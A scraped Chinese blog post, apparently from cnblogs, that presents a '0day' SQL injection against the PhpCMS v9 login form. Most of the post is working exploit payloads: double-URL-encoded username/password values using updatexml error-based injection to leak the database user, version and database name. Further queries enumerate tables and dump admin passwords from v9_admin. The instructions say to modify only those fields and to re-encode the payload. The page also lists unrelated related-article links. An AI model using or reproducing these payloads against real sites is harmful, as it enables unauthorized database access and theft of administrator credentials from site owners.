zoukankan      html  css  js  c++  java

  • 【原创】phpcms v9 0day

    在登陆处修改username和password即可 其他不要动

    username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2buser())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

      

    版本

    username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bversion())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

      库

    username=phpcms&password=123456%26username%3d%2527%2bunion%2bselect%2b%25272%2527%252c%2527test%255c%2527%252cupdatexml(1%252cconcat(0x5e24%252c(select%2bdatabases())%252c0x5e24)%252c1)%252c%255c%2527123456%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%2527%255c%2527%252c%255c%25272%255c%2527%252c%255c%252710%255c%2527)%252c(%255c%25272%255c%2527%252c%255c%2527test%2527%252c%25275f1d7a84db00d2fce00b31a7fc73224f%2527%252c%2527123456%2527%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%252cnull%2523

      爆出表

    updatexml(1,concat(0x5e24,(select table_name from information_schema.tables where table_schema='phpcms' limit 0,1),0x5e24),1) 
       


    只要url编码一下 替换一下就ok了
    在 updatexml里必须只能有三个值

    所以爆帐号密码要一个一个爆

    updatexml(1,concat(0x5e24,(select password from v9_admin limit 0,1),0x5e24),1)
  • 相关阅读:
    FFmpegTool 这个是很早以前写得ffmpeg c99部分转C89工具代码
    mmsplayer V2 for IOS 完成. V2 所有汇总
    关于mmsplayer一些电台不支持播放问题说明
    libmpg123 解码库用法
    [置顶] mmsplayer V2 for IOS 完成. V2 所有汇总
    使用lipo合并iPhone模拟器和真机的静态类库
    vbs编程
    Adobe reader查阅PDF文件无法显示中文
    常去的下载网站
    .Net程序设计快速入门——分页设计篇
  • 原文地址:https://www.cnblogs.com/blck/p/4974058.html
Copyright © 2011-2022 走看看